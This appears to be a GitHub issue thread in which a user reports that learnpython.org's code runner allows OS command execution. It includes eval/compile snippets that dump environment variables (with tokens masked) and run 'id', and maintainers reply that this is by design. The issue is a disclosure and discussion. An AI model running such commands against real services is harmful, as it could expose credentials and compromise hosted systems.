Security Concerns

[bakera81]

On learnpython.org, you can execute OS level commands.

Steps to Reproduce

1. Head over to https://www.learnpython.org/en/Hello%2C_World%21 Example to get OS environment data:

   eval(compile('for x in range(1): 
   import os 
   print(os.environ)','a','single')) 

   Returns:

   environ({'PYTHONPATH': '/usr/local/lib/python3.5/dist-packages:/var/lib/python/site-packages', 'LC_ALL': 'en_US.UTF-8', 'HOSTNAME': '****', 'SHARED_PYTHON_PATH': '/var/lib/python/site-packages', 'LANGUAGE': 'en_US:en', 'HOME': '/home/repl', 'GITHUB_TOKEN': '****', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin', 'PROXYTOKEN': '****', 'SHARED_R_PATH': '/var/lib/R/shared_libs', 'PYTHONWARNINGS': 'ignore', 'PYTHON_BACKEND_DEBUG': 'False', 'LANG': 'en_US.UTF-8', 'BOKEH_SERVER_URL': 'https://bokeh-server.datacamp.com/', 'TERM': 'xterm'})

   Example to get OS code execution (simple example using 'id' command:

   eval(compile("""__import__('os').popen(r'id').read()""",'','single')) 

   Returns:

   Out[1]: 'uid=1000(repl) gid=1000(repl) groups=1000(repl)

More info: https://sethsec.blogspot.com/2016/11/exploiting-python-code-injection-in-web.html

[machow]

You don't need to use eval. These commands can be run directly on any datacamp light python exercises. However, it is being run as root (which hopefully protects against most issues):

[filipsch]

@bakera81 not sure if this is a security issue. Our code execution service allows people to run arbitrary python code, so code for OS-level commands. However, this code is executed as a non-root user, so your ability to mess things up is rather limited. I'm closing this, as this is something we're aware of, but if you have a targeted example where this is troublesome, please reopen!